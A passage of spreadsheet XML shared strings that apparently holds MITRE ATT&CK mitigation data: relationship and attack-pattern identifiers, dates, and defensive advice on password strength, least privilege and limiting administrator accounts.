    <t>Use strong passwords to increase the difficulty of credential hashes from being cracked if they are obtained.</t>
  </si>
  <si>
    <t>relationship--6537d47a-80c0-442b-a1ec-3451d078a2a9</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</si>
  <si>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</si>
  <si>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relationship--487a6f8b-669d-4d72-8be8-38a48af51308</t>
  </si>
  <si>
    <t>The password for the user's login keychain can be changed from the user's login password. This increases the complexity for an adversary because they need to know an additional password.</t>
  </si>
  <si>
    <t>relationship--8e620d3d-6766-4f26-a6ae-d7fd1276916f</t>
  </si>
  <si>
    <t>relationship--766f4421-06f4-4ce1-9d67-85572dbdbeb1</t>
  </si>
  <si>
    <t>relationship--f9ed8046-c00b-4d8a-a8d2-833f45f1dfcb</t>
  </si>
  <si>
    <t>relationship--7d770dbe-1baa-4411-bd37-b703c6f86585</t>
  </si>
  <si>
    <t>Ensure that &lt;code&gt;AllowReversiblePasswordEncryption&lt;/code&gt; property is set to disabled unless there are application requirements.(Citation: store_pwd_rev_enc)</t>
  </si>
  <si>
    <t>relationship--6a1d90c0-f103-4e7f-b462-73749407dceb</t>
  </si>
  <si>
    <t>09 February 2022</t>
  </si>
  <si>
    <t>relationship--88997806-0c0f-47a7-b381-0ddd24f81f67</t>
  </si>
  <si>
    <t>relationship--4775487a-b632-43f9-8372-83219e2aa98c</t>
  </si>
  <si>
    <t>relationship--00f95333-8677-4c6c-9f67-c8ebf0fcf607</t>
  </si>
  <si>
    <t>relationship--37a08308-6dc4-4e20-bdb1-907b37cda04b</t>
  </si>
  <si>
    <t>relationship--7a3426bf-1751-43db-b844-6bf388a4c817</t>
  </si>
  <si>
    <t>Ensure that local administrator accounts have complex, unique passwords.</t>
  </si>
  <si>
    <t>relationship--214b91f3-a71f-45b2-b85a-b1510d947806</t>
  </si>
  <si>
    <t>relationship--59a5fbfa-c750-4945-bb9b-c535c36ab969</t>
  </si>
  <si>
    <t>relationship--8b88b63a-c415-4218-b579-6a10de86b6eb</t>
  </si>
  <si>
    <t>Refer to NIST guidelines when creating password policies for master passwords.(Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>relationship--f569160b-af34-4919-8cfc-0dce1762e87d</t>
  </si>
  <si>
    <t>21 June 2021</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</si>
  <si>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</si>
  <si>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relationship--e2748683-077b-4e91-9225-6b29245fdafc</t>
  </si>
  <si>
    <t>relationship--c215cce3-a2f5-4534-937c-b15d7be4588c</t>
  </si>
  <si>
    <t>relationship--fef0f7bc-5af4-4a5c-bd73-5892badf8707</t>
  </si>
  <si>
    <t>Use strong passphrases for private keys to make cracking difficult.</t>
  </si>
  <si>
    <t>relationship--2d3a898c-bdc3-4cc1-ae14-325dbb60f2e2</t>
  </si>
  <si>
    <t>relationship--7e3d1339-90a7-4fc6-b742-4229f3e76b97</t>
  </si>
  <si>
    <t>relationship--18123847-de00-44e0-a758-b860a215f0de</t>
  </si>
  <si>
    <t>Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed.</t>
  </si>
  <si>
    <t>relationship--f72aba67-b581-4836-b5f7-74d125aa906c</t>
  </si>
  <si>
    <t>Ensure SSH key pairs have strong passwords and refrain from using key-store technologies such as ssh-agent unless they are properly protected.</t>
  </si>
  <si>
    <t>relationship--a58b2f24-9fa1-4dd6-9977-7c201fbfe5ed</t>
  </si>
  <si>
    <t>relationship--6d552780-38aa-451b-9b37-a82a5400cd0e</t>
  </si>
  <si>
    <t>relationship--365e1449-7ef2-4370-9f42-7d288f883d99</t>
  </si>
  <si>
    <t>Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network.</t>
  </si>
  <si>
    <t>relationship--7a20546a-c6be-4c1b-8b41-23cfb551f933</t>
  </si>
  <si>
    <t>relationship--cb2238b0-bd8e-4b21-b692-d1f362c102b4</t>
  </si>
  <si>
    <t>Consider rotating access keys within a certain number of days to reduce the effectiveness of stolen credentials.</t>
  </si>
  <si>
    <t>relationship--25b225e4-2365-4c00-8a27-f578a7fd94c8</t>
  </si>
  <si>
    <t>23 October 2019</t>
  </si>
  <si>
    <t>Use strong passphrases for private keys to make cracking difficult. Do not store credentials within the Registry. Establish an organizational policy that prohibits password storage in files.</t>
  </si>
  <si>
    <t>relationship--529b0951-548c-4316-93d1-baf97d89f10a</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</si>
  <si>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</si>
  <si>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relationship--4f24d075-4d6c-49d2-a213-306e4af2083d</t>
  </si>
  <si>
    <t>M1056</t>
  </si>
  <si>
    <t>Pre-compromise</t>
  </si>
  <si>
    <t>course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc</t>
  </si>
  <si>
    <t>attack-pattern--d21bb61f-08ad-4dc1-b001-81ca6cb79954</t>
  </si>
  <si>
    <t xml:space="preserve">This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. </t>
  </si>
  <si>
    <t>relationship--fe213f16-3667-4c29-8434-cea26be64f31</t>
  </si>
  <si>
    <t>This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.</t>
  </si>
  <si>
    <t>relationship--aefa2807-65bf-4b81-b91b-d8ec2dfbd80b</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</si>
  <si>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</si>
  <si>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relationship--004fbe29-2537-418e-9951-a2750a5fa901</t>
  </si>
  <si>
    <t>15 April 2021</t>
  </si>
  <si>
    <t>attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074</t>
  </si>
  <si>
    <t>relationship--833b16fc-34c1-4ad9-bbb4-a0054cdc7f10</t>
  </si>
  <si>
    <t>attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3</t>
  </si>
  <si>
    <t>relationship--958d5dfd-89f6-4563-bfcd-1999e35d40be</t>
  </si>
  <si>
    <t>attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f</t>
  </si>
  <si>
    <t>relationship--b03847f1-8b42-4457-8856-d5769e0f6e60</t>
  </si>
  <si>
    <t>attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75</t>
  </si>
  <si>
    <t>relationship--86c466ea-44e7-4018-a223-ce8d2ab81bc8</t>
  </si>
  <si>
    <t>relationship--99a5e60d-62f7-4dc6-af50-99e57e92eaab</t>
  </si>
  <si>
    <t>attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a</t>
  </si>
  <si>
    <t>relationship--c12b8252-0222-4cca-a8ca-d91be4ea663e</t>
  </si>
  <si>
    <t>attack-pattern--926d8cfd-1d0d-4da2-ab49-3ca10ec3f3b5</t>
  </si>
  <si>
    <t>relationship--053731ec-3b29-470c-ad6e-f3e116cf4e69</t>
  </si>
  <si>
    <t>relationship--15cae685-cd89-4b79-b89b-e7153fb16ba2</t>
  </si>
  <si>
    <t>relationship--35054627-12cd-4613-bbbd-0c5848fe06f8</t>
  </si>
  <si>
    <t>relationship--d06c7363-a7f6-43b1-8af8-9d3b9975160c</t>
  </si>
  <si>
    <t>relationship--f5f4cd1c-b71b-4cdd-ab7c-77a5981bb56b</t>
  </si>
  <si>
    <t>attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161</t>
  </si>
  <si>
    <t>relationship--1dc273bd-fb9d-4a36-a234-37ec11238e26</t>
  </si>
  <si>
    <t>attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea</t>
  </si>
  <si>
    <t>This cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.</t>
  </si>
  <si>
    <t>relationship--c2b9d474-44f8-4815-9f60-be81af2776ab</t>
  </si>
  <si>
    <t>attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81</t>
  </si>
  <si>
    <t>relationship--132985bb-b5bd-4fce-b61d-ae3177de73f7</t>
  </si>
  <si>
    <t>relationship--bb0f5803-3c4c-46d4-a499-36baf1fb156c</t>
  </si>
  <si>
    <t>attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532</t>
  </si>
  <si>
    <t>relationship--17b92de6-f308-4468-8b2e-c1b2edf08e46</t>
  </si>
  <si>
    <t>attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867</t>
  </si>
  <si>
    <t>relationship--8bc57fb8-9379-4bcb-9f9f-d40cd86bca57</t>
  </si>
  <si>
    <t>relationship--17fde86e-66f2-4432-881c-b162c0501204</t>
  </si>
  <si>
    <t>attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca</t>
  </si>
  <si>
    <t>relationship--d5e474fe-11a9-419b-bf16-734189c8da5d</t>
  </si>
  <si>
    <t>relationship--0d600c05-c617-46f4-947f-cdd6ca56d494</t>
  </si>
  <si>
    <t>relationship--5761f7ba-920b-491b-a010-d12645dedf0b</t>
  </si>
  <si>
    <t>attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d</t>
  </si>
  <si>
    <t>relationship--c3c37431-5f1a-4282-ac0b-fd4270d67cd7</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</si>
  <si>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</si>
  <si>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relationship--c296b445-a4b5-4e73-91b0-0c6c9f3eed1b</t>
  </si>
  <si>
    <t>relationship--242f96c4-460f-49e6-80a9-79ea85348c2d</t>
  </si>
  <si>
    <t>relationship--7c817fbc-5dff-4059-8230-b8040dabde61</t>
  </si>
  <si>
    <t>16 April 2021</t>
  </si>
  <si>
    <t>attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b</t>
  </si>
  <si>
    <t>relationship--771bb993-77b0-4019-906e-b59011943740</t>
  </si>
  <si>
    <t>attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a</t>
  </si>
  <si>
    <t>relationship--9e7ff28c-3c76-488d-8fb3-623a19ee55c1</t>
  </si>
  <si>
    <t>relationship--611ad683-7772-4592-bbd4-e5589591a76e</t>
  </si>
  <si>
    <t>09 December 2021</t>
  </si>
  <si>
    <t>attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156</t>
  </si>
  <si>
    <t>relationship--48c021af-5bce-4a16-aec1-21970cc59497</t>
  </si>
  <si>
    <t>relationship--3b09f6eb-ff5a-4d95-ae24-d4f6934a8fc6</t>
  </si>
  <si>
    <t>attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2</t>
  </si>
  <si>
    <t>relationship--c5811e32-72d6-4ac8-8769-15772e7ac50f</t>
  </si>
  <si>
    <t>attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636</t>
  </si>
  <si>
    <t>relationship--e6767ba4-3cb7-4819-b8c8-d72dcab05858</t>
  </si>
  <si>
    <t>attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d</t>
  </si>
  <si>
    <t>relationship--db136518-5008-4104-93c1-112c4478c8bf</t>
  </si>
  <si>
    <t>relationship--9a433652-118d-428e-8ff0-551543a062a7</t>
  </si>
  <si>
    <t>relationship--362f4bd6-59d6-4e3f-81f0-5358b7f3f9d5</t>
  </si>
  <si>
    <t>attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109</t>
  </si>
  <si>
    <t>relationship--78968b8c-61ed-44d9-835c-05eb5b2ab169</t>
  </si>
  <si>
    <t>attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23</t>
  </si>
  <si>
    <t>relationship--024d5595-aa4e-4d47-bc31-5b8ea5ed73c0</t>
  </si>
  <si>
    <t>relationship--b97134c8-c42a-4121-ab8b-bf519bf3d457</t>
  </si>
  <si>
    <t>attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3</t>
  </si>
  <si>
    <t>relationship--3b1a38d3-8d4c-472f-9433-098560a3208f</t>
  </si>
  <si>
    <t>attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f</t>
  </si>
  <si>
    <t>relationship--324e2e47-513c-4803-91d7-96d45cdd9480</t>
  </si>
  <si>
    <t>attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4</t>
  </si>
  <si>
    <t>relationship--efb1d5a5-0182-4104-982c-6de98e11a055</t>
  </si>
  <si>
    <t>relationship--c4b215ab-a9ba-43aa-a354-8ac0289abde1</t>
  </si>
  <si>
    <t>relationship--e28dd993-e11d-4cce-b029-e3e5194a2482</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</si>
  <si>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</si>
  <si>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relationship--dc37d868-23ec-41f1-a945-b3f3312294e6</t>
  </si>
  <si>
    <t>relationship--6bf03275-b5bb-4c67-b3a6-5a4642d763e6</t>
  </si>
  <si>
    <t>relationship--c6d22962-0e39-4339-a574-81e4891694a2</t>
  </si>
  <si>
    <t>attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413</t>
  </si>
  <si>
    <t>relationship--175d65f0-0f57-4cad-a655-4f068a1e02ad</t>
  </si>
  <si>
    <t>attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5</t>
  </si>
  <si>
    <t>relationship--bddcd118-8a69-450e-b680-c5d52d5098f4</t>
  </si>
  <si>
    <t>attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e</t>
  </si>
  <si>
    <t>relationship--17ad59c0-1aff-490b-bb43-02e1d0292a87</t>
  </si>
  <si>
    <t>relationship--d40b183e-3714-4e2c-a738-caff2db7054a</t>
  </si>
  <si>
    <t>attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f</t>
  </si>
  <si>
    <t>relationship--994b4e31-eabb-4aa0-b7c1-e0ade6017009</t>
  </si>
  <si>
    <t>relationship--549f2414-e810-4fc9-a944-571348acb86c</t>
  </si>
  <si>
    <t>attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f</t>
  </si>
  <si>
    <t>relationship--fbb82f95-94fd-4faf-a106-8c7a7191446e</t>
  </si>
  <si>
    <t>relationship--96311328-0188-437f-b1c6-1f95676732e0</t>
  </si>
  <si>
    <t>attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4</t>
  </si>
  <si>
    <t>relationship--87df901e-dd6b-4eae-9a63-b546c169d192</t>
  </si>
  <si>
    <t>attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968</t>
  </si>
  <si>
    <t>relationship--6417adf9-8767-4258-9d26-6e95a43bef47</t>
  </si>
  <si>
    <t>attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3</t>
  </si>
  <si>
    <t>relationship--fdde385f-3781-47fa-9cb7-ef7c5b903e63</t>
  </si>
  <si>
    <t>relationship--4659b352-d455-43a6-981a-49c5858c7dcf</t>
  </si>
  <si>
    <t>relationship--5cf196e1-fccd-438c-b292-24a3607c1118</t>
  </si>
  <si>
    <t>relationship--1dcc92d5-0299-4c6c-b86b-f2d3718a9bda</t>
  </si>
  <si>
    <t>relationship--e9baf508-6ac2-46b3-843e-d45974866af0</t>
  </si>
  <si>
    <t>attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327</t>
  </si>
  <si>
    <t>relationship--0a328420-501e-4d8d-b2bd-9b3d4562e767</t>
  </si>
  <si>
    <t>relationship--ae6add8b-17b3-4d50-be1a-8e4efec7fc01</t>
  </si>
  <si>
    <t>attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f</t>
  </si>
  <si>
    <t>relationship--e36e7b1a-aa7b-4354-92d4-4373b9911b51</t>
  </si>
  <si>
    <t>relationship--90a11110-2124-4d1f-92b7-1d5525e3ba8d</t>
  </si>
  <si>
    <t>relationship--bd82a68a-af53-45c7-ac0e-d8cdac989080</t>
  </si>
  <si>
    <t>relationship--24580154-43e3-4194-b840-d3c7924bc797</t>
  </si>
  <si>
    <t>M1026</t>
  </si>
  <si>
    <t>Privileged Account Management</t>
  </si>
  <si>
    <t>course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f</t>
  </si>
  <si>
    <t>Follow best practices in restricting access to privileged accounts to avoid hostile programs from accessing such sensitive information.</t>
  </si>
  <si>
    <t>relationship--4274e62f-1dc9-47d0-800a-f812cfe4e071</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</si>
  <si>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</si>
  <si>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relationship--7e024389-346c-489b-a406-1bbdec150eda</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</si>
  <si>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</si>
  <si>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relationship--b82ceba5-d988-472d-acd4-b7b1bc49ebbc</t>
  </si>
  <si>
    <t>Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</t>
  </si>
  <si>
    <t>relationship--9ffc8525-79a5-40a2-b371-46052daf66c5</t>
  </si>
  <si>
    <t>Do not allow domain administrator or root accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</t>
  </si>
  <si>
    <t>relationship--8b4c2543-e2f1-4f7c-b687-d07e7a4c763c</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</si>
  <si>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</si>
  <si>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relationship--2606e684-b69d-47fc-822f-279d197a1e7a</t>
  </si>
  <si>
    <t>relationship--53c22ca9-b02f-4a45-adc6-cf7763a2c6a9</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</si>
  <si>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</si>
  <si>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relationship--e23ce4ac-b82c-4af1-9545-2bb237a03ed1</t>
  </si>
  <si>
    <t>Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to install a bootkit.</t>
  </si>
  <si>
    <t>relationship--99662840-c630-4858-8d44-331d0b31fbc1</t>
  </si>
  <si>
    <t>Ensure containers are not running as root by default. In Kubernetes environments, consider defining Pod Security Standards that prevent pods from running privileged containers.(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>relationship--52ded6c4-f6f1-4c9a-8973-4378a91193d5</t>
  </si>
  <si>
    <t>Remove users from the local administrator group on systems.</t>
  </si>
  <si>
    <t>relationship--922037af-61f0-42d8-8b57-310b6b56ea5a</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</si>
  <si>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</si>
  <si>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relationship--b9ef32ed-bec0-4f2a-863c-5c8400d9a970</t>
  </si>
  <si>
    <t>Use of proper Identity and Access Management (IAM) with Role Based Access Control (RBAC) policies to limit actions administrators can perform and provide a history of administrative actions to detect unauthorized use and abuse.</t>
  </si>
  <si>
    <t>relationship--bf5fcae9-bc18-4278-bf0c-be7237a5d8eb</t>
  </si>
  <si>
    <t>Limit the number of accounts with permissions to create other accounts. Do not allow privileged accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</t>
  </si>
  <si>
    <t>relationship--6a11c7bd-61ef-4b08-bee5-856f3bd401d1</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</si>
  <si>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</si>
  <si>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relationship--4dbb52bd-9ecf-4c61-91b2-9787860f737c</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</si>
  <si>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</si>
  <si>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relationship--fa8ade25-da1d-4df1-9717-f812cb012837</t>
  </si>
  <si>
    <t>Limit the number of cloud accounts and services with permission to query the secrets manager to only those required. Ensure that accounts and services with permissions to query the secrets manager only have access to the secrets they require.</t>
  </si>
  <si>
    <t>relationship--04724f1d-f6ff-448e-bcac-4bcda34d895b</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</si>
  <si>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</si>
  <si>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relationship--dd49738c-ba78-41bb-a459-65e89d3faf2a</t>
  </si>
  <si>
    <t>Limit the usage of local administrator and domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries.</t>
  </si>
  <si>
    <t>relationship--482ec859-f060-4131-a17f-5695587853e1</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</si>
  <si>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</si>
  <si>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relationship--ad32e902-6f48-4c8f-bc3d-2fc06f045eed</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</si>
  <si>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</si>
  <si>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relationship--67a63d3a-30a5-43b6-a593-dc08581b460a</t>
  </si>
  <si>
    <t>Use the principle of least privilege for privileged accounts such as the service account in Kubernetes. For example, if a pod is not required to access the Kubernetes API, consider disabling the service account altogether.(Citation: Kubernetes Service Accounts)</t>
  </si>
  <si>
    <t>relationship--803c83dc-fe82-40e4-8aa7-35c95269ef8f</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</si>
  <si>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</si>
  <si>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relationship--9dcf3707-34ff-4a44-b65b-fc1f8f127bf5</t>
  </si>
  <si>
    <t>relationship--75a29a2d-548e-4aba-b33f-5322936b9e7a</t>
  </si>
  <si>
    <t>Limit the number of accounts with permissions to create other accounts. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</t>
  </si>
  <si>
    <t>relationship--b465fe54-83e6-4d1c-b752-d13bb788c3ac</t>
  </si>
  <si>
    <t>relationship--62b22a20-4049-4f0d-b879-235e8ab96764</t>
  </si>
  <si>
    <t>Limit the number of accounts and services with permission to query information from password stores to only those required. Ensure that accounts and services with permissions to query password stores only have access to the secrets they require.</t>
  </si>
  <si>
    <t>relationship--0a4819da-bba0-487b-abff-41d6fba75922</t>
  </si>
  <si>
    <t>If it is necessary that software must store credentials in the Registry, then ensure the associated accounts have limited permissions so they cannot be abused if obtained by an adversary.</t>
  </si>
  <si>
    <t>relationship--21454d73-1532-4656-9cd6-172f046613b3</t>
  </si>
  <si>
    <t>relationship--d729c871-d15b-4213-a492-b44fc1e96328</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</si>
  <si>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</si>
  <si>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relationship--eb21bd35-77bb-4bc4-868d-b6e0940375ca</t>
  </si>
  <si>
    <t>relationship--eb0c4e7c-a412-43ca-b135-e7b78060bda5</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</si>
  <si>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</si>
  <si>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relationship--4cdd118b-5ad8-4607-94b2-be828038b5ff</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</si>
  <si>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</si>
  <si>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relationship--7fc1c3bb-05f7-4593-b8c3-f9833c114672</t>
  </si>
  <si>
    <t>Use least privilege and protect administrative access to the Domain Controller and Active Directory Federation Services (AD FS) server. Do not create service accounts with administrative privileges.</t>
  </si>
  <si>
    <t>relationship--48357d6a-6d00-42a6-b687-cbd5a9a8ecd6</t>
  </si>
  <si>
    <t>05 January 2021</t>
  </si>
  <si>
    <t>Use the principal of least privilege and protect administrative access to domain trusts.</t>
  </si>
  <si>
    <t>relationship--53b041d2-4250-473e-b7c6-3b05fcdf3d3f</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</si>
  <si>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</si>
  <si>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relationship--b099746f-3c9f-41e8-95b2-af6ee5c10e83</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</si>
  <si>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</si>
  <si>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relationship--690a7276-e560-4d69-92bc-feecf7d0cc73</t>
  </si>
  <si>
    <t>Use least privilege for service accounts will limit what permissions the exploited process gets on the rest of the system.</t>
  </si>
  <si>
    <t>relationship--4d50a045-d85d-481f-ac7d-672065f1e348</t>
  </si>
  <si>
    <t>Minimize permissions and access for service accounts to limit impact of exploitation.</t>
  </si>
  <si>
    <t>relationship--9ff11dd9-23a1-46d9-913d-c580d45667f2</t>
  </si>
  <si>
    <t>Ensure critical system files as well as those known to be abused by adversaries have restrictive permissions and are owned by an appropriately privileged account, especially if access is not required by users nor will inhibit system functionality.</t>
  </si>
  <si>
    <t>relationship--9a8788d7-3f27-49b4-bb60-0b0d581fa812</t>
  </si>
  <si>
    <t>Prevent adversary access to privileged accounts or access necessary to replace system firmware.</t>
  </si>
  <si>
    <t>relationship--b4dafcd2-fed8-4266-b83e-f4033ada0d55</t>
  </si>
  <si>
    <t>Restrict permissions and access to the AD FS server to only originate from privileged access workstations.(Citation: FireEye ADFS)</t>
  </si>
  <si>
    <t>relationship--673afcb8-2fb0-4c17-9f91-8fb409943531</t>
  </si>
  <si>
    <t>Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts.</t>
  </si>
  <si>
    <t>relationship--a6e6f751-5c93-4a31-afdc-78513aaea15a</t>
  </si>
  <si>
    <t>Limit on-premises accounts with access to the hybrid identity solution in place. For example, limit Azure AD Global Administrator accounts to only those required, and ensure that these are dedicated cloud-only accounts rather than hybrid ones.(Citation: MagicWeb)</t>
  </si>
  <si>
    <t>relationship--a7c79cef-cd50-4106-a78d-fc56cb2da51a</t>
  </si>
  <si>
    <t>Do not allow administrator accounts that have permissions to add IIS components to be used for day-to-day operations that may expose these permissions to potential adversaries and/or other unprivileged systems.</t>
  </si>
  <si>
    <t>relationship--05ae3ecc-6920-4828-b708-f0acdf0e2ff3</t>
  </si>
  <si>
    <t>Limit permissions associated with creating and modifying platform images or containers based on the principle of least privilege.</t>
  </si>
  <si>
    <t>relationship--8dfdc783-d869-498b-b4e0-1d75b30e2d67</t>
  </si>
  <si>
    <t>relationship--c111033c-3544-43b8-9168-32590659557d</t>
  </si>
  <si>
    <t>Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators.(Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>relationship--fb2122bc-cf7a-4e0b-8dcb-5ab27e37ea13</t>
  </si>
  <si>
    <t>Limit access to the root account and prevent users from loading kernel modules and extensions through proper privilege separation and limiting Privilege Escalation opportunities.</t>
  </si>
  <si>
    <t>relationship--4907e8fb-e224-49a6-aa94-5a76afa714ba</t>
  </si>
  <si>
    <t>Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.(Citation: Tilbury Windows Credentials)</t>
  </si>
  <si>
    <t>relationship--bce3518d-52d4-4dc3-9de0-4d801048220d</t>
  </si>
  <si>
    <t>relationship--aa2cd10c-5062-4abb-a8ec-0e178a5440ec</t>
  </si>
  <si>
    <t>relationship--5e5ee6b9-182f-47fb-a0b5-71c3c52fed12</t>
  </si>
  <si>
    <t>13 September 2021</t>
  </si>
  <si>
    <t>Limit the number of accounts permitted to create other accounts. Limit the usage of local administrator accounts to be used for day-to-day operations that may expose them to potential adversaries.</t>
  </si>
  <si>
    <t>relationship--b94f3018-c2f2-473e-96ee-23889cb018bb</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</si>
  <si>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</si>
  <si>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relationship--4f8dca9b-86d0-4d97-98ed-c98240cc3933</t>
  </si>
  <si>
    <t>relationship--49aeba9e-9ae9-4eb2-873e-b8ab4f8ab347</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</si>
  <si>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</si>
  <si>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relationship--dafa1584-bdd9-4c46-be07-2d002a529948</t>
  </si>
  <si>
    <t>relationship--de4ce747-488a-4def-8ede-8a3d371c9dd4</t>
  </si>
  <si>
    <t>Restrict execution of Msiexec.exe to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage.</t>
  </si>
  <si>
    <t>relationship--f3b4fdd4-24fa-48ed-8ffb-f80ad651c797</t>
  </si>
  <si>
    <t>relationship--5e3f6da4-a327-4c42-8a12-bc5840336430</t>
  </si>
  <si>
    <t>relationship--cef47b7b-6ecb-458b-8224-d797223a4689</t>
  </si>
  <si>
    <t>relationship--415fc129-cac9-4d8c-8285-8ea563489b03</t>
  </si>
  <si>
    <t>relationship--bb1aff02-36e4-402e-9bd0-23bfd588e4ab</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</si>
  <si>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</si>
  <si>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relationship--edbdc10d-a3d6-46f8-9354-ba06995dce08</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</si>
  <si>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</si>
  <si>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relationship--a266294c-18a7-4a6e-8291-a901748c929c</t>
  </si>
  <si>
    <t>Limit credential overlap across systems to prevent the damage of credential compromise and reduce the adversary's ability to perform Lateral Movement between systems.</t>
  </si>
  <si>
    <t>relationship--b06103d8-d410-418e-851a-63ca820cc27e</t>
  </si>
  <si>
    <t>Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts.(Citation: ADSecurity AD Kerberos Attacks)</t>
  </si>
  <si>
    <t>relationship--0347a294-8928-4d15-8df2-44452b40afe4</t>
  </si>
  <si>
    <t>relationship--a4c24712-a5cf-4c44-91cd-057dc0a85e0f</t>
  </si>
  <si>
    <t>Limit access to the root account and prevent users from modifying PAM components through proper privilege separation (ex SELinux, grsecurity, AppArmor, etc.) and limiting Privilege Escalation opportunities.</t>
  </si>
  <si>
    <t>relationship--327a2877-8820-4def-8cd8-787f06cfd987</t>
  </si>
  <si>
    <t>relationship--e631d85f-e93c-475f-bd40-546544c99e90</t>
  </si>
  <si>
    <t>Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to perform these actions</t>
  </si>
  <si>
    <t>relationship--b2651406-190a-4341-8d76-f9c25f66077b</t>
  </si>
  <si>
    <t>Follow best practices in restricting access to privileged accounts to avoid hostile programs from accessing sensitive information.</t>
  </si>
  <si>
    <t>relationship--d039cf20-a85b-4179-b164-6200decb9bd8</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</si>
  <si>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</si>
  <si>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relationship--78af537b-48cc-411d-a209-3e01c44aa87b</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</si>
  <si>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</si>
  <si>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relationship--c7676864-765f-4c08-951e-fb14f35f16c1</t>
  </si>
  <si>
    <t>Consider removing the local Administrators group from the list of groups allowed to log in through RDP.</t>
  </si>
  <si>
    <t>relationship--b6c10d21-5e91-4dfc-b76e-e94d7142ed32</t>
  </si>
  <si>
    <t>relationship--e7e4be4c-a6ae-44bc-b3af-9c0c41f9212e</t>
  </si>
  <si>
    <t>Do not allow remote access to services as a privileged account unless necessary.</t>
  </si>
  <si>
    <t>relationship--e3f593f3-0cea-4795-95a1-7be411c91291</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</si>
  <si>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</si>
  <si>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relationship--062789ad-19d9-4c8c-82db-474d9f19c9c9</t>
  </si>
  <si>
    <t>relationship--b51d04ec-51da-4017-b806-210429592565</t>
  </si>
  <si>
    <t>Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.</t>
  </si>
  <si>
    <t>relationship--935ca61c-b4ff-4cfc-a4e9-9b8aa9514ea3</t>
  </si>
  <si>
    <t xml:space="preserve">Do not allow administrator accounts that have permissions to add component software on these services to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems. </t>
  </si>
  <si>
    <t>relationship--c2d97d3f-c597-4070-acb0-6c000eac5d39</t>
  </si>
  <si>
    <t>Do not allow remote access via SSH as root or other privileged accounts.</t>
  </si>
  <si>
    <t>relationship--e4f247ea-4fd6-44c0-9d19-19477fadcb52</t>
  </si>
  <si>
    <t>Restrict administrator accounts to as few individuals as possible, following least privilege principles, that may be abused to remotely boot a machine in safe mode.(Citation: CyberArk Labs Safe Mode 2016)</t>
  </si>
  <si>
    <t>relationship--9f823a97-8924-496c-80f4-cf256ef640da</t>
  </si>
  <si>
    <t>relationship--00b0b6ec-a9eb-4fdd-b7ea-6e6c8a8ab1fc</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</si>
  <si>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</si>
  <si>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relationship--8f09085f-c1cf-4321-89c4-17d93e774f6f</t>
  </si>
  <si>
    <t>relationship--789a2c4e-9152-4b83-a275-58f6b5262a81</t>
  </si>
  <si>
